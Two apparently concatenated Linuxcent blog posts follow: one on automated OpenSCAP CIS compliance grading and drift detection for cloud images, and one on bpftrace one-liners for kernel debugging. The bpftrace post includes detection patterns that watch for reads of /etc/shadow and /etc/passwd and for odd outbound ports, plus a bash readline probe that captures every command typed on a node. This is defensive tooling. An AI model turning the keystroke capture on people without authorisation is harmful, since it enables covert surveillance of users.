"Were they scanned before or after a recent kernel update?"
"Why is C running an old OpenSCAP version?"

Automated OpenSCAP compliance means the grade is generated the same way, on every image, every time, before the image is ever deployed.

EP03 showed that the same HardeningBlueprint YAML builds consistent OS images across six cloud providers. What it left open is the question every auditor eventually asks: how do you know the Ansible hardening actually did what you think it did? Running Ansible-Lockdown successfully means the tasks ran. It does not mean every CIS control is satisfied — some controls can’t be applied by Ansible alone, some require manual verification, and some interact with the environment in unexpected ways.

A compliance team requested CIS L2 evidence for a SOC 2 Type II audit. The security team had been running OpenSCAP scans — but manually, on-demand, using slightly different profiles across teams, with no standard for how to store or compare results.

The audit found four problems:
1. Two instances had been scanned with CIS L1, not L2, despite being labeled “CIS L2”
2. Three instances hadn’t been scanned in over six months
3. The scan outputs from different teams were in different formats (HTML vs XML vs text)
4. Two instances showed “91% passing” and “89% passing” — with no documentation of whether those were acceptable thresholds or what the failing controls were

The audit took two weeks to resolve. The finding wasn’t a security failure — it was a documentation and process failure. But it consumed two weeks of engineering time and appeared in the audit report as a gap.

The root cause: compliance scanning was a manual step that produced inconsistent output in an inconsistent format.

How Automated OpenSCAP Compliance Works

Every Stratum build ends with an automated OpenSCAP scan:

stratum build --blueprint ubuntu22-cis-l1.yaml --provider aws
      │
      ├─ Provisions build instance
      │
      ├─ Runs Ansible-Lockdown (144 tasks)
      │
      ├─ Runs post-build OpenSCAP scan
      │    ├── Profile: CIS Ubuntu 22.04 L1 (from blueprint)
      │    ├── OpenSCAP version: pinned in blueprint (default: latest)
      │    └── 100 controls checked
      │
      ├─ Calculates grade
      │    ├── Passing:   92 controls
      │    ├── Failing:   6 controls
      │    ├── Overrides: 2 (documented in blueprint)
      │    └── Grade: A (94/100 effective, 98% pass rate)
      │
      ├─ Writes to image metadata:
      │    compliance_grade=cis-l1-A-94
      │    compliance_scan_date=2026-04-19
      │    compliance_blueprint=ubuntu22-cis-l1.yaml@v1.2
      │
      └─ Snapshots AMI (or fails if grade < min_grade)

The grade is written into the AMI (or GCP/Azure image) metadata at creation time. It travels with the image. Any instance launched from this AMI carries the provenance of what was applied and what grade was achieved.

The A-F Grade Calculation

The grade is not a simple percentage. It accounts for documented overrides and applies a threshold-based letter scale:

Total CIS controls:    100
Passing:               92
Failing:               6 (genuine failures)
Overrides (compliant): 2 (documented in blueprint, counted as passing)

Effective passing:     94 / 100
Grade:                 A

Grade thresholds (configurable per blueprint):

Grade	Default threshold	Meaning
A	≥ 95% effective	Production-ready, minimal exceptions
B	85–94%	Acceptable with documented exceptions
C	70–84%	Below standard — deploy with caution
D	55–69%	Significant gaps — do not deploy to production
F	< 55%	Hardening failed — image not snapshotted

The thresholds are configurable in the blueprint:

compliance:
  benchmark: cis-l1
  controls: all
  min_grade: B          # Build fails if grade < B
  grade_thresholds:
    A: 95
    B: 85
    C: 70
    D: 55

If the build produces a grade below min_grade, the instance is terminated and no image is created. The failure is logged with the full list of controls that blocked the grade.

Reading the Scan Output

# Show the last build's scan results
stratum scan --show-last --blueprint ubuntu22-cis-l1.yaml

# Output:
# Build: ubuntu22-cis-l1 @ 2026-04-19T15:42:01Z
# Provider: aws (ap-south-1)
# Grade: A (94/100 effective controls)
#
# Passing controls: 92
# Failing controls: 6
# ──────────────────────────────────────────────
# FAIL  1.1.7   Ensure separate partition for /var/log/audit
#       Reason: tmpfs used — separate block device not configured
#       Remediation: Add /var/log/audit to separate EBS volume
#
# FAIL  1.6.1.3 Ensure AppArmor is enabled in bootloader config
#       Reason: GRUB_CMDLINE_LINUX missing apparmor=1 security=apparmor
#       Remediation: Update /etc/default/grub, run update-grub, reboot
#
# FAIL  3.1.1   Ensure IPv6 is disabled if not needed
#       Reason: net.ipv6.conf.all.disable_ipv6=0
#       Remediation: Set in /etc/sysctl.d/60-kernel-hardening.conf
# ...
#
# Overrides (compliant): 2
# ──────────────────────────────────────────────
# OVERRIDE  1.1.2   tmpfs /tmp via systemd unit — equivalent control
# OVERRIDE  5.2.4   SSH timeout managed by session manager policy

The failing controls tell you exactly what to fix and how to fix it. This is the difference between “87% passing” as a number and “87% passing” as an actionable gap list.

SARIF Export

Every scan produces a SARIF (Static Analysis Results Interchange Format) file:

# Export scan results to SARIF
stratum scan \
  --instance i-0abc123 \
  --benchmark cis-l1 \
  --output sarif \
  --out-file scan-results/i-0abc123-cis-l1.sarif

SARIF is the standard format for security scan results. It’s directly importable into:

GitHub Advanced Security — upload via actions/upload-sarif, results appear in the Security tab
Jira — import as security findings, linked to the image or instance ID
Splunk / SIEM — structured JSON, parseable as events
AWS Security Hub — importable as findings via the Security Hub API

For audit purposes, the SARIF file is the evidence artifact. It contains the full scan profile, every control result, the OpenSCAP version, the scan timestamp, and the machine it was run against.

# Upload to GitHub Advanced Security
stratum scan \
  --instance i-0abc123 \
  --benchmark cis-l1 \
  --output sarif \
  --github-upload \
  --github-ref $GITHUB_REF \
  --github-sha $GITHUB_SHA

Drift Detection

The grade at build time is the baseline. Any instance can be rescanned against the blueprint that built it:

# Rescan a running instance
stratum scan --instance i-0abc123 --blueprint ubuntu22-cis-l1.yaml

# Output:
# Instance: i-0abc123 (launched from ami-0a7f3c9e82d1b4c05)
# Original grade (build):  A (94/100) — 2026-01-15
# Current grade (rescan):  B (87/100) — 2026-04-19
#
# Drifted controls (7):
#   3.3.2  TCP SYN cookies: FAIL — net.ipv4.tcp_syncookies=0
#           Last passing: 2026-01-15 (build)
#           Current value: 0 (expected: 1)
#
#   5.3.2  sudo log_input: FAIL — rule removed from /etc/sudoers.d/
#           Last passing: 2026-01-15 (build)
#           Current value: [rule absent] (expected: Defaults log_input)

Drift detection is how you find the instances that were “temporarily” modified and never reverted. The scan compares the current state against the baseline — not against a generic CIS profile, but against the specific blueprint version that built the image.

Scanning Without a Build: Assessing Existing Instances

For instances not built with Stratum, you can run a standalone scan:

# Assess an existing instance against CIS L1
stratum scan --instance i-0legacy123 --benchmark cis-l1

# No blueprint comparison — just the raw CIS grade
# Output:
# Grade: C (72/100)
# 28 controls failing
# ...

This is useful for assessing the state of instances built before Stratum was in use, or for comparing a manual hardening approach against the benchmark.

What Controls Typically Block an A Grade

For Ubuntu 22.04 CIS L1 builds in most cloud environments, these are the controls that most commonly prevent an A grade:

Control	Why it often fails	Fix
1.1.7 `/var/log/audit` separate partition	Cloud images don’t have separate volumes at build time	Add EBS volume, configure at launch
1.6.1 AppArmor bootloader config	GRUB parameters not set correctly	Update `/etc/default/grub`, run `update-grub`
3.1.1 Disable IPv6	Cloud networking sometimes requires IPv6	Override with documented reason if intentional
5.2.21 SSH MaxStartups	Default sshd_config not updated	Add `MaxStartups 10:30:60` to sshd_config
6.1.10 World-writable files	Some package installations leave world-writable files	Post-install cleanup in Ansible role

The first two (separate audit partition, AppArmor bootloader) are the most common A→B blockers and often require architecture decisions about how volumes are provisioned at launch versus build time.

Key Takeaways

Automated OpenSCAP compliance means every image has a verified, reproducible grade generated by the same scanner with the same profile, before it’s ever deployed
The A-F grade accounts for documented overrides from the blueprint — the failing controls in the output are genuine gaps, not known exceptions
SARIF export makes scan results importable into GitHub Advanced Security, Jira, SIEM, and audit tooling
Drift detection catches configuration changes that happen after the image is deployed — the grade at build time is the baseline
Images that score below min_grade don’t get snapshotted — the failed build tells you exactly which controls to fix

What’s Next

Automated OpenSCAP compliance gives every image a verified grade before deployment. What EP04 left open is what happens after the grade is known — specifically, what prevents an engineer from deploying a C-grade image to production “just this once.”

The Pipeline API is the answer. EP05 covers the CI/CD compliance gate: POST /api/pipeline/scan fails the build if the image grade is below threshold. The unhardened image never reaches production — not because engineers are disciplined, but because the pipeline won’t let it through.

Next: CI/CD compliance gate — block unhardened images before they reach production

Get EP05 in your inbox when it publishes → linuxcent.com/subscribe

The post Compliance Grading — Automated OpenSCAP with A-F Scores Before Deployment appeared first on Linuxcent.

bpftrace — Kernel Answers in One Line

Vamshi Krishna Santhapuri — Sun, 10 May 2026 02:00:00 +0000

Reading Time: 8 minutes

eBPF: From Kernel to Cloud, Episode 9
What Is eBPF? · The BPF Verifier · eBPF vs Kernel Modules · eBPF Program Types · eBPF Maps · CO-RE and libbpf · XDP · TC eBPF · bpftrace**

TL;DR

bpftrace is an eBPF compiler, not a monitoring agent — every one-liner compiles, loads, runs, and cleans up a complete kernel program
(think of it like kubectl exec — but for asking the kernel a direct question, with no agent, no sidecar, no prior setup)
kretprobe and tracepoint cover most production debugging needs; use tracepoints for stability across kernel versions
The security use cases are unique: kernel-level observation that an attacker inside a container cannot suppress
Every connection, every file open, every process spawn — observable in real time with a single command, no prior instrumentation
Production caution: high-frequency probes on hot paths add overhead; filter by pid/comm, use --timeout, watch %si
Container PIDs are host-namespace PIDs in bpftrace — use curtask->real_parent->tgid to correlate to container activity

bpftrace turns any kernel question into a one-liner — compiling, loading, and attaching a complete eBPF program in seconds, with no agents, no restarts, and no prior instrumentation on the node. When something is wrong on a node right now and you don’t know where to look, it’s how you ask the kernel a direct question. That’s what EP09 is about.

Quick Check: Is bpftrace Available on Your Node?

Before the one-liner toolkit — verify bpftrace is installed and working on a cluster node:

# SSH into a worker node, then:
bpftrace --version
# bpftrace v0.19.0   ← any version ≥ 0.16 supports the patterns in this episode

# Verify BTF is available (required for struct access one-liners)
ls /sys/kernel/btf/vmlinux && echo "BTF available"

# The simplest possible one-liner — count syscalls for 5 seconds
bpftrace -e 'tracepoint:raw_syscalls:sys_enter { @[comm] = count(); }' --timeout 5

Expected output (abridged):

Attaching 1 probe...

@[containerd]: 312
@[kubelet]:    841
@[node_exporter]: 203
@[sshd]:       47

Each line is a process name and how many syscalls it made in 5 seconds. If this runs and produces output, everything in this episode will work on your node.

Not on a self-managed node? EKS managed nodes and GKE nodes don’t have bpftrace pre-installed, but you can run it from a privileged debug pod: kubectl debug node/ -it --image=quay.io/iovisor/bpftrace. The tool runs on the host kernel — you get full kernel visibility even from a pod.

A node in production started showing elevated TCP latency — p99 at 180ms, where p99 was normally under 10ms. The application logs were clean. The APM dashboard showed nothing unusual at the service level. CPU, memory, disk: all normal. The load balancer health checks were passing.

I had 12 minutes before the on-call escalation would have gone to the application team and started a war room.

I ran one command:

bpftrace -e 'kretprobe:tcp_recvmsg { @bytes[comm] = hist(retval); }' --timeout 10

Ten seconds of sampling. The histogram output showed a single process — backup-agent — receiving 4MB chunks at irregular intervals. Not the application. Not the service mesh. A backup agent that runs at the infrastructure layer, saturating the receive path with large reads during its scheduled window.

Found in 9 seconds. War room averted.

What made that possible is something most engineers don’t know about bpftrace: that one-liner is not a monitoring query. It’s a complete eBPF program — compiled, loaded into the kernel, attached to the tcp_recvmsg kernel return probe, run, and cleaned up — all in ten seconds. bpftrace is a compiler that happens to have a very convenient command-line interface.

What bpftrace Actually Is

bpftrace is not a monitoring tool. It’s an eBPF compiler with a high-level scripting language designed for one-shot investigation.

When you run bpftrace -e 'kretprobe:tcp_recvmsg { ... }', this is what happens:

Your one-liner
      ↓
bpftrace's built-in LLVM/Clang frontend
      ↓
eBPF bytecode (.bpf.o in memory)
      ↓
Kernel verifier validates the program
      ↓
JIT compiler compiles to native machine code
      ↓
Program attaches to tcp_recvmsg kretprobe
      ↓
Runs until Ctrl-C or --timeout
      ↓
Output printed, maps freed, program detached

The kernel doesn’t know bpftrace wrote the program. It’s the same path as Falco, Cilium, Tetragon — kernel program loaded via the BPF syscall, verified, JIT-compiled, attached to a probe. bpftrace just wraps that entire process in a scripting language that takes 30 seconds to write instead of an afternoon.

This is why bpftrace can answer questions that no other tool can: it compiles to a kernel-level observer that fires on any event in the kernel, on any process, on any container — without any prior instrumentation.

The Four Probe Types You’ll Use Most

bpftrace supports 20+ probe types. These four cover 90% of production debugging:

kprobe / kretprobe — Kernel Functions

Attaches to the entry (kprobe) or return (kretprobe) of any kernel function. The most powerful probes for understanding what the kernel is actually doing.

# Fire on every call to tcp_connect — who's making new TCP connections?
bpftrace -e 'kprobe:tcp_connect { printf("%s PID %d connecting\n", comm, pid); }'

# On return from tcp_recvmsg — how large are the reads per process?
bpftrace -e 'kretprobe:tcp_recvmsg { @[comm] = hist(retval); }'

# Count calls to vfs_write per process (file write activity)
bpftrace -e 'kprobe:vfs_write { @[comm] = count(); }'

Limitation: kernel functions are internal and can change between kernel versions. Use tracepoints (below) for stability when you can.

kprobe instability: A function targeted by a kprobe can be inlined by the kernel compiler — the compiler embeds the function’s code at its call sites with no separate entry point. When that happens, the kprobe silently fires on nothing. Verify before relying on one: bpftrace -l 'kprobe:function_name' — empty response means it was inlined. Use a tracepoint equivalent instead.

tracepoint — Stable Kernel Trace Points

Tracepoints are stable, versioned hooks explicitly placed in the kernel source. Unlike kprobes, they are part of the kernel’s public interface and guaranteed not to disappear between versions. Use these for anything you need to work reliably across a fleet with mixed kernel versions.

# Every file open — process name + filename
bpftrace -e 'tracepoint:syscalls:sys_enter_openat {
    printf("%s %s\n", comm, str(args->filename));
}'

# Every outbound connect — process, destination IP and port
bpftrace -e 'tracepoint:syscalls:sys_enter_connect {
    printf("%-16s %-6d\n", comm, pid);
}'

# List all available tracepoints (hundreds)
bpftrace -l 'tracepoint:syscalls:*' | head -30

uprobe — Userspace Function Probes

Attaches to a specific function in a userspace binary or library. Useful for observing application behaviour without recompiling.

# What bash commands are being typed on this node?
bpftrace -e 'uprobe:/bin/bash:readline { printf("%s\n", str(arg0)); }'

# Python function calls
bpftrace -e 'uprobe:/usr/bin/python3:PyObject_Call { printf("Python call: pid %d\n", pid); }'

From a security standpoint: this is how you observe what an attacker is typing in an interactive shell they’ve obtained on your node — in real time, from the kernel, without touching the terminal session.

interval — Periodic Sampling

Runs a block of code on a fixed interval. Used for aggregation and periodic stats.

# Print the top file-opening processes every 5 seconds
bpftrace -e '
kprobe:vfs_open { @[comm] = count(); }
interval:s:5  { print(@); clear(@); }
'

The One-Liner Toolkit: Runnable Right Now

These run on any Linux node with BTF (kernel 5.8+, Ubuntu 20.04+, most managed K8s nodes):

# What files is every process opening right now? (30-second view)
bpftrace -e 'tracepoint:syscalls:sys_enter_openat {
    printf("%-16s %s\n", comm, str(args->filename));
}' --timeout 30

# Who is making DNS queries? (catches queries from any container, no sidecar needed)
bpftrace -e 'tracepoint:net:net_dev_xmit {
    if (args->skbaddr->protocol == 0x0800) printf("%s\n", comm);
}'

# Latency histogram for all read() syscalls — find the slow process
bpftrace -e '
tracepoint:syscalls:sys_enter_read { @start[tid] = nsecs; }
tracepoint:syscalls:sys_exit_read  {
    $latency = nsecs - @start[tid];
    @latency[comm] = hist($latency);
    delete(@start[tid]);
}' --timeout 15

# Which process is using the most CPU right now? (99Hz sampling)
bpftrace -e 'profile:hz:99 { @[comm] = count(); }' --timeout 10

# Real-time syscall frequency — find unusual process activity
bpftrace -e 'tracepoint:raw_syscalls:sys_enter { @[comm, args->id] = count(); }' --timeout 10 \
  | sort -k3 -rn | head -20

# New TCP connections in the last 30 seconds — source and dest
bpftrace -e 'kprobe:tcp_connect {
    $sk = (struct sock *)arg0;
    printf("%-16s → %s:%d\n", comm,
           ntop(AF_INET, $sk->__sk_common.skc_daddr),
           $sk->__sk_common.skc_dport >> 8);
}' --timeout 30

# What is a specific PID doing? (replace 12345)
bpftrace -e 'tracepoint:syscalls:sys_enter_openat /pid == 12345/ {
    printf("%s\n", str(args->filename));
}'

Each of these compiles and loads in under 2 seconds. They leave no persistent state. When they exit, the kernel reverts to exactly the state it was in before.

The Security Use Cases

Watching an Active Session

If you suspect a process is running commands you didn’t deploy:

# See every bash command on this node in real time
bpftrace -e 'uprobe:/bin/bash:readline { printf("%s %s\n", comm, str(arg0)); }'

# Every process spawn — PID, parent, command
bpftrace -e 'tracepoint:syscalls:sys_enter_execve {
    printf("%-6d %-6d %s\n", pid, curtask->real_parent->tgid, str(args->filename));
}'

This is the kernel-level version of watching /var/log/auth.log — except it can’t be suppressed by an attacker who has root, because the probe runs in kernel space. An attacker who has compromised a container with root inside the container cannot prevent a bpftrace program on the host from observing their syscalls.

Detecting Unexpected Network Activity

# Any process making a connection to a non-standard port
bpftrace -e 'kprobe:tcp_connect {
    $sk = (struct sock *)arg0;
    $port = $sk->__sk_common.skc_dport >> 8;
    if ($port != 80 && $port != 443 && $port != 53) {
        printf("%-16s port %d\n", comm, $port);
    }
}'

# DNS queries to non-standard resolvers (anything not on port 53)
bpftrace -e 'tracepoint:syscalls:sys_enter_sendto {
    if (args->addr->sa_family == 2) {
        printf("%-16s → %s\n", comm, str(args->addr));
    }
}'

Watching File Access on Sensitive Paths

# Any access to /etc/passwd, /etc/shadow, /root/
bpftrace -e 'tracepoint:syscalls:sys_enter_openat {
    if (str(args->filename) == "/etc/passwd" ||
        str(args->filename) == "/etc/shadow") {
        printf("%-16s PID %-6d opened %s\n", comm, pid, str(args->filename));
    }
}'

Production Gotchas

CPU overhead: bpftrace probes fire synchronously in the traced context. High-frequency probes on hot kernel paths (vfs_read, sys_enter_* without filtering) can add 10–20% overhead. Always test with --timeout and watch %si before running on a production node.

Maps grow unbounded by default: @[comm] = count() will accumulate an entry per unique comm value forever in the current session. Use clear(@) in an interval block, or set a key limit: @[comm] = count(); if (@[comm] > 100) { clear(@comm); }.

kprobe instability: Functions targeted by kprobes can be inlined by the compiler between kernel versions, making the probe silently ineffective. If a kprobe isn’t firing, verify the function exists: bpftrace -l 'kprobe:function_name'. If it returns nothing, the function was inlined. Use a tracepoint equivalent instead.

Container PIDs: PIDs inside a container are different from host PIDs. pid in bpftrace is the host namespace PID.

Container PID semantics: When a container shows PID 1 internally, the host kernel sees it as PID 8432 (or whatever was assigned). bpftrace’s pid built-in always gives you the host-namespace PID. To map a container’s PID to the host PID: cat /proc//status | grep NSpid — the second value is the PID inside the container. Or use curtask->real_parent->tgid in your probe to walk the process tree. This matters when you filter by pid in a one-liner and get no output — you may be filtering on the container-namespace PID instead of the host one.

BTF requirement: bpftrace requires BTF for struct field access ($sk->__sk_common.skc_daddr). If BTF is unavailable, struct access fails. Check /sys/kernel/btf/vmlinux exists before running struct-access one-liners.

Quick Reference

Probe type	Syntax	Use for
kernel function entry	`kprobe:function_name`	Function arguments
kernel function return	`kretprobe:function_name`	Return value, latency
kernel tracepoint	`tracepoint:subsys:name`	Stable, versioned hooks
userspace function	`uprobe:/path/to/bin:function`	App-level observation
CPU sampling	`profile:hz:99`	Flamegraphs, hot code
interval	`interval:s:N`	Periodic aggregation
process start	`tracepoint:syscalls:sys_enter_execve`	New process detection

Built-in variable	Value
`pid`	Process ID (host namespace)
`tid`	Thread ID
`comm`	Process name (15 chars)
`nsecs`	Nanoseconds since boot
`curtask`	Pointer to `task_struct`
`retval`	Return value (kretprobe/tracepoint exit)
`args`	Probe arguments struct

Key Takeaways

bpftrace is an eBPF compiler, not a monitoring agent — every one-liner compiles, loads, runs, and cleans up a complete kernel program
kretprobe and tracepoint cover most production debugging needs; use tracepoints for stability across kernel versions
The security use cases are unique: kernel-level observation that an attacker inside a container cannot suppress, because the probe runs on the host in kernel space
Every connection, every file open, every process spawn — observable in real time with a single command, no prior instrumentation
Production caution: high-frequency probes on hot paths add overhead; filter by pid/comm, use --timeout, watch %si

What’s Next

bpftrace answers questions you ask in the moment. EP10 covers what happens when you need those answers continuously — not as a one-shot investigation tool, but as persistent telemetry recording every network connection across your entire cluster.

Flow observability from TC hooks is the always-on version: a persistent eBPF program recording every connection attempt, every retransmit, every dropped packet — the ground truth layer that everything above it interprets. When your APM says “timeout” and the kernel says “retransmit storm to one specific endpoint,” the kernel is right.

Next: network flow observability at the kernel level

Get EP10 in your inbox when it publishes → linuxcent.com/subscribe

The post bpftrace — Kernel Answers in One Line appeared first on Linuxcent.